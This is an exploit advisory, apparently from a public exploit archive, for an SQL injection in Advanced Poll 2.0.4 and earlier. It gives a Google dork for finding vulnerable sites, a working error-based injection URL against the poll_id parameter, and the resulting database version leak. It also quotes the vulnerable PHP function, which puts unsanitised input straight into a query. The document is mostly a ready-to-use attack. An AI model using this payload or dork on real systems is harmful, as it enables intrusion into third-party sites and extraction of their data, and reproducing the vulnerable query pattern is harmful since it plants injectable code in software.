Advanced Poll version <= 2.0.4 SQL-injection

# Exploit Title: Advanced Poll version <= 2.0.4 SQL-injection
# Date: 31.12.2011
# Author: Ereee
# Version: <=2.0.4
# Category:: [remote, webapps]
# Google dork: inurl:"popup.php?action=results"
# Tested in: web

Query:
http://localhost/poll/demo_3.php?poll_id=1+or+1+group+by+concat_ws(0x3a, version(),rand(0)|0)+having+min(0)--+f
Result:
Error Number: 1062 Duplicate entry '5.0.77:1' for key 'group_key'

Vulnerable code in class_poll.php
########################################
function is_valid_poll_id($poll_id) {
if ($poll_id>0) {
$this->db->fetch_array($this->db->query("SELECT poll_id FROM ".$this->tbl['poll_index']." WHERE poll_id=$poll_id AND status<'2'"));
return ($this->db->record['poll_id']) ? true : false;
} else {
return false;
}
}
########################################

Greetz to : forum.antichat.ru&rdot.org members



#  0day.today [2018-03-20]  #